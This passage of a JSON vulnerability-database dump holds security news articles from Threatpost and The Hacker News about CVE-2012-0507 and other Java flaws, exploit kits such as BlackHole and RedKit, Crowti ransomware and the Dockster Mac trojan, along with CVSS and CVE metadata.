United States.\n\n[![Crowti_Ransomware](https://media.threatpost.com/wp-content/uploads/sites/103/2014/10/07011932/crowti1.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/10/07011932/crowti1.png>)\n\nSimilar to CryptoWall, [a fairly recent Cryptolocker variant](<http://threatpost.com/cryptowalls-haul-1m-in-six-months/107978>), Crowti uses a valid digital signature to appear legitimate and then, once installed, demands users pay in Bitcoin to purportedly decrypt their files.\n\nLike most ransomware campaigns, Crowti relies on several methods of infection.\n\nPrimarily it\u2019s being launched via .ZIP files that come as an attachment in spam emails. Microsoft has discovered a handful of generically titled attachments \u2013 VOICE, IncomingFax, document, Complaint_IRS_id, etc. \u2013 all designed to dupe users into clicking and installing the malware.\n\nResearchers have also seen Crowti propagating via popular exploit kits like [Nuclear](<http://threatpost.com/tag/nuclear-pack-exploit-kit>), [RIG ](<http://threatpost.com/rig-exploit-kit-pushing-cryptowall-ransomware/106540>)and RedKit V2, exploiting old and out-of-date versions of Adobe Flash and Oracle Java.\n\nMost of the exploits being used to spread Crowti have long since been patched. Adobe remedied [CVE-2014-0556](<http://helpx.adobe.com/security/products/flash-player/apsb14-21.html>) just last month and [2014-0515](<http://helpx.adobe.com/security/products/flash-player/apsb14-13.html>) in April while Oracle pushed an update to address the Java issue, [CVE-2012-0507](<http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html>), way back in February 2012 but that hasn\u2019t stopped attackers from targeting depreciated apps running on those systems.\n\nCrowti has also made its way onto systems alongside other types of malware, including Upatre, Zbot and Zemot, according to Microsoft, who warned of the ransomware [in a blog entry on Tuesday](<http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx>).\n\n[![Crowti_Ransomware2](https://media.threatpost.com/wp-content/uploads/sites/103/2014/10/07011927/crowti4.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/10/07011927/crowti4.png>)\n\nWhile Crowti shares several traits with other types of ransomware, it\u2019s even borrowing their names as well. In some cases Microsoft claims the malware is branding itself as CryptoWall or CryptoDefense when it informs victims their information has been encrypted. Like CryptoWall and its variants, Crowti eventually directs its victims to a Tor page and gives them instructions on how to purchase Bitcoin to unlock their information.\n\nThe similarities don\u2019t end there.\n\nMuch like how Barracuda Labs discovered a CryptoWall variant [with a valid digital signature last month](<http://threatpost.com/new-signed-version-of-cryptowall-ransomware-on-the-loose/108613>), Microsoft stumbled upon a sample of Crowti at the end of September that was also being distributed with a seemingly legitimate certificate.\n\nThat certificate\u2014since revoked, like the CryptoWall variant, was issued by Comodo yet researchers claim they\u2019ve seen instances of the ransomware using a certificate from The Nielsen Company as well.\n", "cvss3": {}, "published": "2014-10-29T14:20:49", "type": "threatpost", "title": "Microsoft Warns of Crowti Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2014-0556"], "modified": "2015-04-13T16:57:47", "id": "THREATPOST:D28C33F2DE823C49041D452AE3C37607", "href": "https://threatpost.com/microsoft-warns-of-crowti-ransomware/109075/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:31", "description": "Attackers and malware writers, like many other people, tend to specialize, honing their skills in one particular discipline in order to maximize their chances for success. But Microsoft researchers have come across a series of malware samples and exploits that show that some attackers are beginning to target the same vulnerability across multiple platforms as a way to make the most out of their efforts.\n\nEven though Windows and Mac are still pretty well separated as platforms, there are a number of applications that run on both operating systems, including things such as Adobe Flash, Reader and Java. Attackers, not wanting to waste any time on small target bases and looking to maximize their profits, are focusing their efforts on vulnerabilities in these applications.\n\nMicrosoft researchers looked at a specific set of vulnerabilities that are found in applications on both Windows and Mac OS X and found that some attackers are going after flaws from as far back as 2009 in Office documents, and 2010 in Flash and Java and Reader.\n\n\u201cThis observation is limited and based on the samples we identified, acquired and processed, however, this understanding provides us with an opportunity to recognize a trend we can describe as economies of scale in cross-platform vulnerabilities. This method of distribution allows the attacker to maximize their capability on multiple platforms. Thus, regardless of a particular attacker\u2019s motive, the value and demand for these vulnerabilities is likely to persist \u2013 we know for a fact that Java vulnerabilities [CVE-2011-3544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>) and [CVE-2012-0507](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507>) are widely used by cybercriminals\u2019 in exploit kits, such as [Blacole/Blackhole](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Blacole>),\u201d [Methusela Cebrian Ferrer](<https://blogs.technet.com/b/mmpc/archive/2012/07/31/economies-of-scale-a-perspective-on-cross-platform-vulnerabilities.aspx?Redirected=true>) of the Microsoft Malware Protection Center wrote.\n\nMicrosoft\u2019s investigation of the way that attackers are using cross-platform vulnerabilities began about a year ago when the company\u2019s researchers came across a backdoor aimed at Mac users. The malware disguised itself as a Google app on the infected machine and then initiated a remote connection to a command-and-control server.\n\n\u201cOnce connected, the remote attacker may take advantage of the backdoor file management feature which allows it to upload, download and navigate through files and directory. For more detail, have a look at the [Backdoor:MacOS_X/Olyx.A description](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Backdoor:MacOS_X/Olyx.A>) in our encyclopedia,\u201d Ferrer wrote at the time. \n\n\u201cFurthermore, another interesting observation here is that the feature set and the code found in this backdoor appear to be similar to that of Gh0st RAT 3.6, also known as \u2018Ghostnet\u2019.\u201d\n\nThe backdoor included both a Mac and Windows executable in the files it installed on infected machines, an unusual behavior for a piece of malware. That got the researchers thinking about what might be going on and whether there were other attackers employing the same strategy and going after bugs on both Windows and OS X.\n\nThis highlights the importance of keeping security software up-to-date, and ensuring operating system and 3rd party security patches are installed (soon after they become available) in order to reduce the risk of malware infection. And, this best practice should extend to all devices and platforms, especially those in large enterprise networks,\u201d Ferrer wrote.\n", "cvss3": {}, "published": "2012-07-31T13:46:56", "type": "threatpost", "title": "Cross-Platform Flaws a Boon For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3544", "CVE-2012-0507"], "modified": "2013-04-17T16:31:46", "id": "THREATPOST:86859A3C9EC793C6A0592ED93308A9DD", "href": "https://threatpost.com/cross-platform-flaws-boon-attackers-073112/76864/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:08", "description": "A new exploit kit hit the scene recently, and according to Arseny Levin of Spiderlabs, the RedKit exploit kit contains an API that generates new host-site URLs every hour.\n\nThe authors of the kit haven\u2019t named it, so Levin and Spiderlabs simply chose to call it RedKit in reference to its color scheme.\n\nRedKit\u2019s most salient feature is the API that creates a fresh attack URL every hour. This feature will make it incredibly difficult to reliably block RedKit infected sites. The kit also has a feature that allows its users to upload an executable and test it against 37 different antivirus solutions.\n\nAs of now, Levin writes that RedKit is exploiting two popular (and patched) vulnerabilities. One is an obfuscated PDF file that exploits the LibTIFF vulnerability (CVE-2010-0188), and the other is an AtomicReferenceArray [Java](<https://threatpost.com/java-osx-and-cross-platform-nightmare-040912/>) vulnerability (CVE-2012-0507), the same one used by [the Flashback trojan](<https://threatpost.com/new-version-flashback-mac-trojan-found-using-java-exploits-022412/>).\n\nLevin believes that RedKit\u2019s authors will have to add new exploits to their kit sometime soon if they hope to keep up with the industry standard Blackhole and Phoenix exploit kits.\n\nResearchers from SpiderLabs found the RedKit on[ some compromised church website](<https://threatpost.com/five-shocking-statistics-latest-internet-threat-report-043012/>) where the kit was being promoted by a banner ad. Users that clicked the ad were redirected to a page that requested their Jabber username. In this way, Levin claims, the RedKit developers can easily pick and choose which individuals they sell their services to.\n\nYou can read the SpiderLabs analysis [here](<http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html>).\n", "cvss3": {}, "published": "2012-05-07T18:46:37", "type": "threatpost", "title": "New Exploit Kit RedKit Discovered in Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2012-0507"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:7B46C96564251E67650F604C0B32BC46", "href": "https://threatpost.com/new-exploit-kit-redkit-discovered-wild-050712/76533/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:52", "description": "Don\u2019t expect any relief from the current assault on Java. A new sandbox-escape exploit targeting a vulnerability in the Java Runtime Environment has been integrated into both the Black Hole and [Gong Da exploit kits](<http://eromang.zataz.com/2012/11/17/gong-da-gondad-exploit-pack-add-java-cve-2012-5076-support/>), setting the stage for additional attacks, researchers said.\n\nThe [exploit was initially discovered in the Cool Exploit Kit](<https://threatpost.com/new-java-attack-introduced-cool-exploit-kit-111212/>) earlier this month and a researcher who goes by the handle Kafeiene told Threatpost that Paunch, the author of Black Hole, is likely behind the exploit.\n\nMeanwhile, researcher Eric Romang wrote on his blog this week that Gong Da has been actively adding Java exploits for months, this one being the latest.\n\nRomang found a website hosting the exploit; he said the site is still online. He said a JavaScript obfuscator, recognized by eight of 44 antimalware detectors on VirusTotal, was masking the malicious files hosted on the site and the presence of Gong Da.\n\nIn addition to the new exploit, which [targets Java SE 7 Update 7](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5076>) and earlier and was patched by Oracle in [Java SE 7 Update 9](<http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html>), it also supports the Oracle Java Rhino exploit, a Java zero-day discovered in August and two other Java exploits detailed in [CVE-2012-1723](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723>) and [CVE-2012-0507](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507>). Previous versions of Gong Da also included exploits for an Adobe Flash Player and Windows Media Player vulnerabilities, but new versions of the kit don\u2019t include those exploits.\n\nMicrosoft, meanwhile, published a detailed analysis of the new Java vulnerability and said the malware it has observed abuses a package access problem in the JRE configuration.\n\n\u201cThis package access is important because, if some trusted code is exposed to the user, it can be abused to break the Java security model. Those packages usually contain critical operations that should not be performed from untrusted code like unsigned Java applets,\u201d said Jeong Wook Oh, a security researcher with Microsoft\u2019s Malware Protection Center. \u201cThese operations are usually about arbitrary class loading and method invoking inside the trusted code area.\u201d\n\nOh said packages such as com.sun.org.glassfish.gmbal were exposed to untrusted Java applets. Applets that are not signed run in the sandbox, which prevents questionable code from running in a trusted environment. \u201cHowever, when some dangerous packages are exposed to untrusted code, the malicious code can access packages that can be abused to create the user\u2019s own class on the fly with escalated privileges,\u201d Oh wrote.\n\nIn addition to privilege escalation and the ability to hop out of the sandbox, the malicious payload also disables the Java security managers, which allows the malware to create files and processes on the user\u2019s system.\n\nOh confirmed that only Java 7 Update 7 is vulnerable. He said the malware did not exploit Java 6, regardless of patch status, and that could be a reason that malware samples exploiting this vulnerability are usually bundled with a series of other Java exploits.\n", "cvss3": {}, "published": "2012-11-20T16:13:34", "type": "threatpost", "title": "Gong Da Exploit Kit Bundling Numerous Java Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723", "CVE-2012-5076"], "modified": "2013-04-17T16:31:13", "id": "THREATPOST:61D681852E79564E99078768957CB417", "href": "https://threatpost.com/gong-da-exploit-kit-bundling-numerous-java-attacks-112012/77232/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:48", "description": "It\u2019s no secret that [Java ](<https://threatpost.com/java-sandbox-bypass-discovered-that-breaks-latest-update/>)has moved to the top of the target list for many attackers. It has all the ingredients they love: ubiquity, cross-platform support and, best of all, lots of vulnerabilities. Malware targeting Java flaws has become a major problem, and new statistics show that this epidemic is following much the same pattern as malware exploiting Microsoft vulnerabilities has for years.\n\nSecurity researchers and software vendors have known for a long time that attackers will wait for new patches to come out and then reverse engineer the fixes in order to find the specifics of the vulnerabilities. It\u2019s a concern, especially for large vendors such as Microsoft, Adobe and Oracle whose software runs on hundreds of millions of machines and have regular, predictable patch cycles that attackers can depend on. This gives them a monthly or quarterly batch of fixes to sink their teeth into.\n\nAnd the attackers also know that many users don\u2019t install patches right away. Microsoft has succeeded in getting many of its customers to use automatic updates, especially in the enterprise. But there still are plenty of users, particularly consumers, who don\u2019t take advantage of automatic updates, leaving them open to attacks. When it comes to Java, anecdotal evidence has supported the idea that even though there has been a steady stream of new vulnerabilities over the last few years, attackers have tended to focus most of their attention on older flaws for which patches already have been published.\n\nResearch from Microsoft shows that there has been a huge spike in malware targeting Java vulnerabilities since the third quarter of 2011, and much of the activity has centered on patched vulnerabilities in Java. Part of the reason for this phenomenon may be that attackers like vulnerabilities that are in multiple versions of Java, rather than just one specific version.\n\n\u201cIn Q3 and Q4 of 2012 two new vulnerabilities, CVE-2012-4681 and CVE-2012-5076, were found. But we didn\u2019t observe any prevalence of Java malware abusing these newer vulnerabilities above malware abusing the older Java vulnerabilities, CVE-2012-0507 and CVE-2012-1723. The reason behind this might be that only Java 7 installations were vulnerable to CVE-2012-4681 and CVE-2012-5076, whereas CVE-2012-0507 and CVE-2012-1723 also target Java 6. As there are still many users that use Java 6, the malware writers might have tried to target Java 6 installations by including older vulnerabilities in the exploit package. We can assume that, for this reason, they didn\u2019t do away with the older vulnerabilities,\u201d [Jeong Wook Oh of Microsoft](<https://blogs.technet.com/b/mmpc/archive/2013/05/12/updated-data-shows-prevalence-of-java-malware-in-2012.aspx?Redirected=true>) said.\n\n\u201cSo there were two kinds of Java vulnerabilities that appeared in 2012 overall: One is the category that applies to both multiple versions of Java including Java 6 and 7, and the other are the vulnerabilities that only applies to Java 7. So when new vulnerabilities that are only applicable to Java 7 are discovered, the attacker\u2019s strategy was usually to combine it with older vulnerabilities that cover more versions of Java. In that way, they could achieve more coverage than just using a single exploit in one package.\u201d\n\nOh looked specifically at four Java vulnerabilities from 2012 that malware targeted, only one of which was a zero day. The other three flaws already had patches available when the malware targeting them appeared. This is the same kind of pattern followed by malware that targets vulnerabilities in Microsoft products and Adobe applications. It, of course, just lends more support to the advice that security experts are always giving users: Install patches as soon as they\u2019re available.\n", "cvss3": {}, "published": "2013-05-13T10:30:31", "type": "threatpost", "title": "Attackers Target Older Java Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723", "CVE-2012-4681", "CVE-2012-5076"], "modified": "2013-05-16T15:26:53", "id": "THREATPOST:B5AADAB1C60C6F2AFCCBC532326ED087", "href": "https://threatpost.com/attackers-target-older-java-bugs/100519/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:22", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073506/fsecurereport.jpg)](<https://threatpost.com/bots-zeus-web-exploits-most-potent-threats-2012-020713/>)Every year it seems that security-related news advances further from its roots in national security circles, IT departments, and the antivirus industry into the mainstream consciousness. From July to the end of year was no exception. However, despite a handful of flashy security stories, F-Secure claims that the second half of 2012 was really about things that rarely (if ever) come up in local and national news: botnets, ZeroAccess in particular, Java and other Web exploits, and the ubiquitous Zeus banking Trojan.\n\nF-Secure\u2019s [assessment [pdf]](<http://www.f-secure.com/static/doc/labs_global/Research/Threat_Report_H2_2012.pdf>) of second half standout threats is somewhat understated considering the other stories that came out during that six month period: rampant misinformation, talk of some global Internet apocalypse, and otherwise irrational hoopla abounded around the FBI\u2019s thoroughly anticipated and largely inconsequential cessation of support for [DNSChanger](<https://threatpost.com/most-what-youve-read-about-dnschanger-wrong-heres-how-070812/>)-infected machines, there was yet-another sophisticated cyberespionage tool, this one called [Gauss](<https://threatpost.com/new-gauss-malware-descended-flame-and-stuxnet-found-thousands-pcs-middle-east-080912/>); the[ Blackhole exploit kit continued improving itself](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/>) as [Cool](<https://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>) and [others](<https://threatpost.com/sweet-orange-exploit-kit-offers-customers-higher-infection-rates-121812/>) emerged to rival the once dominant crime-pack; [someone targeted Iran with malware (again)](<https://threatpost.com/iran-cert-reports-new-data-wiping-malware-121712/>); there was[ an out-of-band, emergency Patch Friday](<https://threatpost.com/microsoft-will-patch-ie-zero-day-friday-fixit-available-stopgap-092012/>) resolving a serious Internet Explorer zero-day; there was [malware with legit Adobe signatures](<https://threatpost.com/whats-meaning-adobe-certificate-attack-092812/>) and a [Linux rootkit](<https://threatpost.com/new-linux-rootkit-emerges-112012/>) and the Dexter malware and [Huawei in the halls of congress](<https://threatpost.com/huawei-denies-stealing-state-secrets-or-supporting-cyber-espionage-090612/>) and [Eurograbber](<https://threatpost.com/zitmo-trojan-variant-eurograbber-beats-two-factor-authentication-steal-millions-120612/>) and [Mac malware targeting Tibetan activists](<https://threatpost.com/variant-mac-malware-targets-tibetan-activists-111412/>) among many, many other threats. Amidst all these, F-Secure researchers are steadfast that the second half of 2012 was about botnets, banking Trojans, and Web exploits.\n\n![F-Secure report](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073502/incidentsfsecure.jpg)\n\n2011 was marked by a number seemingly successful botnet takedowns, but in 2012 some of those botnet were resurrected by there botmasters, the report indicates. Zeus came back strong, implementing new features, like \u201c[gameover](<https://threatpost.com/gameover-zeus-variant-sends-malicious-email-cutwail-botnet-120512/>)\u201d that shifted the bot away from a centralized command and control infrastructure and toward more of a peer-to-peer structure. Despite takedown attempts new Zeus variants like [Citadel](<https://threatpost.com/citadel-trojan-it-s-not-just-banking-fraud-anymore-020113/>) and Ice IX emerged and the bot continues to make cybercrime easy for thieves of all skill levels. [The Carberp botnet](<https://threatpost.com/carberp-banking-trojan-goes-commercial-adds-bootkit-and-40k-price-tag-121412/>) resurfaced as well. A bot called [DorkBot](<https://threatpost.com/dorkbot-now-worming-its-way-through-skype-100812/>) hit the scene in October making money through click-fraud and ransomware scams.\n\nAndroid bots are still in their infancy, largely serving SMS spam, the report claims. Android malware, however, is making strides, accounting for some 79 percent of all mobile malware. Symbian comes in a distant second, accounting for only 19 percent of such threats.\n\nF-Secure\u2019s report especially highlights [the ZeroAcces botnet](<https://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/>), which they claim was the fastest growing network in the second half of the year. It\u2019s partially a click-fraud bot with 140,000 unique IPs clicking 140 million ads per day, reportedly costing legitimate ad networks, who have difficulty determining the difference between real and fraudulent clicks, more than $900,000 a day. ZeroAccess is also an effective Bitcoin miner as well, allocating at least half of its resources to stealing the digital currency.\n\nThe Zeus banking Trojan (as opposed to the Zeus botnet mentioned above) continues its reign as the most prolific bank robber of the Internet age, injecting websites with phishing forms and stealing user login credentials. F-Secure saw 644 URLs, mostly in the US, targeted by Zeus\u2019s Web-injections over the six month span. The sites included personal and corporate banking sites, investment and trading sites, credit card services, and more generally popular websites.\n\nThe vast majority of attacks, the report claims, centered around just four vulnerabilities: Windows TrueType-related CVE- 2011-3402, Adobe-related CVE-2010-0188, and the Java-related CVE-2012-4681 and CVE-2012-5076 vulnerabilities. CVE-2012-0507 and CVE-2012-1723, also Java issues, came in a distant fifth and sixth place respectively.\n\nF-Secure attributes this vulnerability preferentiality to the rise of the exploit kit and kit-makers\u2019 tendency toward building exploits for these particular vulnerabilities into their kits, often faster than the respective vendors can ship patches. In many cases, these vulnerabilities have been fixed, but many users remain stubborn about installing updates.\n\nVulnerability exploitation along with social engineering is increasing as the preferred infection vector that used to be dominated by Trojans. F-Secure\u2019s data revealed that such attacks accounted for 28 percent of infections. Among vulnerability exploiting attacks, 68 percent of the malware exploited the java development platform.\n\n\u201cThe sheer volume of Java-related detections indicate both the widespread popularity of that platform and its susceptibility to the malicious inventiveness of malware authors,\u201d wrote the researchers.\n\nF-Secure also highlights the reality that as Webhosting becomes easier and more seamless for well-meaning users, it also becomes so for criminals. Dynamic DNS providers, subdomain and redirection hosting, blog and content hosting, file hosting, and app markets are among the most commonly used services for malware distribution.\n\nThere were no major, platform-specific malware outbreaks of note in the last six months, according to the report. On the contrary, attackers seem to have taken a liking to cross-platform attacks where OS-neutral malware can infect different operating systems. Once that system is compromised the attacker can determine which operating system it runs before loading OS-specific malware onto it.\n\n[Watering hole attacks](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>) are now a suitable alternative to more traditional corporate espionage methods involving maliciously crafted documents loaded up with malware and exploits. Instead of infecting random sites or trying to spear-phish persons of interest, attackers are compromising sites that they believe their targets are likely to visit (i.e. watering holes) in order to install backdoors on high-value networks. [Organizations that service potentially valuable targets are now at risk of acting as an attack vector themselves](<https://threatpost.com/indirectly-compromising-valuable-targets-weaker-business-partners-020613/>), meaning that target organizations now must keep an eye on the websites and other services that their employees are likely to use in addition to monitoring their own networks.\n\nAccording to the report, Windows remains the most frequently targeted operating system, but malware authors are increasingly attempting to target Apple users. In all of 2011, F-Secure recorded just 59 variants of Mac malware. In the second half of 2012, the number of unique samples increased to 121.\n\nIn other news, passwords remain problematic.\n\n\u201cThe password is dead and we all know it. But unfortunately, its successor has yet to turn up,\u201d researchers wrote.\n", "cvss3": {}, "published": "2013-02-07T16:13:55", "type": "threatpost", "title": "Bots, Zeus, Web Exploits: the Most Potent Threats of 2012", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-0188", "CVE-2012-0507", "CVE-2012-1723", "CVE-2012-4681", "CVE-2012-5076"], "modified": "2013-05-13T18:07:30", "id": "THREATPOST:635801BB456AF20B4CCF183C2BD94E5A", "href": "https://threatpost.com/bots-zeus-web-exploits-most-potent-threats-2012-020713/77492/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2023-05-11T00:20:23", "description": "[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-CaOC2-3avn0/UL9d6sK_DPI/AAAAAAAAOeY/kssomtH64Kc/s728-e365/dalailama_com.png>)\n\nA new trojan horse app called Dockster is targeting Mac users by exploiting a known Java vulnerability CVE-2012-0507. The trojan is apparently being delivered through a website (gyalwarinpoche.com) dedicated to the Dalai Lama and once installed can collect user keystrokes and other personal information.\n\n**Mac in Danger ? **Earlier this spring, a Russian security firm discovered a trojan piece of malware which took advantage of a Java vulnerability on many computers, Macs and PCs alike. This trojan, known as \"Flashback,\" was used to enlist some 600,000 infected computers into a botnet.\n\n \n\n\nMalware also provides an interface that allows attackers to download and execute additional malware. Dockster has been found to use the same exploit code as the previous SabPab virus to gain access through a backdoor. Dockster is also said to launch an agent called mac.dockset.deman, which restarts each time a user logs in to their Mac.\n\n \n\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-6Aa-WXIvIzg/UL9dkhxBbuI/AAAAAAAAOeQ/Ir2HrBHonXo/s728-e365/Dockster.png>)\n\n \nDockster is only the latest Mac-based threat to hit organizations and people sympathetic to Tibet's conflict with the Chinese government.\n\n \n\n\nIn April, another piece of malware, known as \"Backdoor.OSX.SabPub,\" or \"SabPub\" was found and distributed through Microsoft Office files sent to those who may sympathize with Tibet. The attackers behind SabPub used a technique known as \"Spear-Phishing,\" a practice used to target smaller groups of people as opposed to sending out mass emails in hopes that someone will click a link.\n\n \n\n\nIn September, security firm AlienVault said it had discovered the creator of the PlugX Remote Access Tool (RAT), which had been used by hackers from various countries to target Tibet. The creator hailed from China.\n", "cvss3": {}, "published": "2012-12-05T14:48:00", "type": "thn", "title": " New Mac Malware 'Dockster' Found on Dalai Lama site", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2012-12-05T14:48:12", "id": "THN:EFEBB9A5904E43291B5B52B245E3718C", "href": "https://thehackernews.com/2012/12/new-mac-malware-dockster-found-on-dalai.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:21:25", "description": "New Java Exploits boosts **BlackHole exploit kit ** \n\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-s1PRDUnEa2g/T3itamE3J9I/AAAAAAAAFfA/_Oy9UrVRl_s/s728-e365/New+Java+Exploits+boosts+BlackHole+exploit+kit.png>)\n\n** \n**\n\nA widely disseminated exploit kit popular with hackers has been updated to take advantage of a recently discovered Java vulnerability. Researchers at Microsoft [reported](<https://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx>) last week that it had observed this vulnerability being exploited in the wild. The Java exploit allows attackers to bypass the Java Runtime Environment's sandbox platform to install malicious code remotely.\n\n \n\n\nThe malicious Java applet is loaded from an obfuscated HTML file. The Java applet contains two Java class files one Java class file triggers the vulnerability and the other one is a loader class used for loading.\n\n \n\n\nNamed CVE-20120-0507, the flaw essentially allows hackers to bypass the Java sandbox, which is a mechanism designed to blunt attacks from malicious code. For its part, the BlackHole exploit kit, available underground, allows users armed with only basic computer knowledge to set up malicious websites to target vulnerable computers through the web browser.\n\n \n\n\nStatistics from vulnerability management firm Rapid7 tell a similar story based on its analysis of the Java patching habits of Internet users. According to the company, the first month after a Java patch is released the fix is deployed by less than 10 percent. After two months, the number jumps to approximately 20 percent. The highest patch rate for Java last year was 38 percent, which represented the percentage who applied the Java Version 6 Update 26 within three months of its release.\n\n \n\n\nAccording to software giant Oracle, Java is deployed across more than 3 billion systems worldwide. But the truth is that many people who have this powerful program installed simply do not need it, or only need it for very specific uses. I've repeatedly encouraged readers to uninstall this program, not only because of the constant updating it requires, but also because there seem to be a never-ending supply of new exploits available for recently-patched or undocumented vulnerabilities in the program.\n", "cvss3": {}, "published": "2012-04-01T19:36:00", "type": "thn", "title": "New Java Exploits boosts BlackHole exploit kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2012-04-01T19:36:52", "id": "THN:902C0A90AF4CEA32ED5D381BB4EB80F7", "href": "https://thehackernews.com/2012/04/new-java-exploits-boosts-blackhole.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:28", "description": "[![](http://2.bp.blogspot.com/-CaOC2-3avn0/UL9d6sK_DPI/AAAAAAAAOeY/kssomtH64Kc/s640/dalailama_com.png)](<http://2.bp.blogspot.com/-CaOC2-3avn0/UL9d6sK_DPI/AAAAAAAAOeY/kssomtH64Kc/s1600/dalailama_com.png>)\n\nA new trojan horse app called Dockster is targeting Mac users by exploiting a known Java vulnerability CVE-2012-0507. The trojan is apparently being delivered through a website (gyalwarinpoche.com) dedicated to the Dalai Lama and once installed can collect user keystrokes and other personal information.\n\n**Mac in Danger ? **Earlier this spring, a Russian security firm discovered a trojan piece of malware which took advantage of a Java vulnerability on many computers, Macs and PCs alike. This trojan, known as \u201cFlashback,\u201d was used to enlist some 600,000 infected computers into a botnet.\n\n \n\n\nMalware also provides an interface that allows attackers to download and execute additional malware. Dockster has been found to use the same exploit code as the previous SabPab virus to gain access through a backdoor. Dockster is also said to launch an agent called mac.dockset.deman, which restarts each time a user logs in to their Mac.\n\n \n\n\n[![](http://4.bp.blogspot.com/-6Aa-WXIvIzg/UL9dkhxBbuI/AAAAAAAAOeQ/Ir2HrBHonXo/s1600/Dockster.png)](<http://4.bp.blogspot.com/-6Aa-WXIvIzg/UL9dkhxBbuI/AAAAAAAAOeQ/Ir2HrBHonXo/s1600/Dockster.png>)\n\n \nDockster is only the latest Mac-based threat to hit organizations and people sympathetic to Tibet's conflict with the Chinese government.\n\n \n\n\nIn April, another piece of malware, known as \u201cBackdoor.OSX.SabPub,\u201d or \u201cSabPub\u201d was found and distributed through Microsoft Office files sent to those who may sympathize with Tibet. The attackers behind SabPub used a technique known as \u201cSpear-Phishing,\u201d a practice used to target smaller groups of people as opposed to sending out mass emails in hopes that someone will click a link.\n\n \n\n\nIn September, security firm AlienVault said it had discovered the creator of the PlugX Remote Access Tool (RAT), which 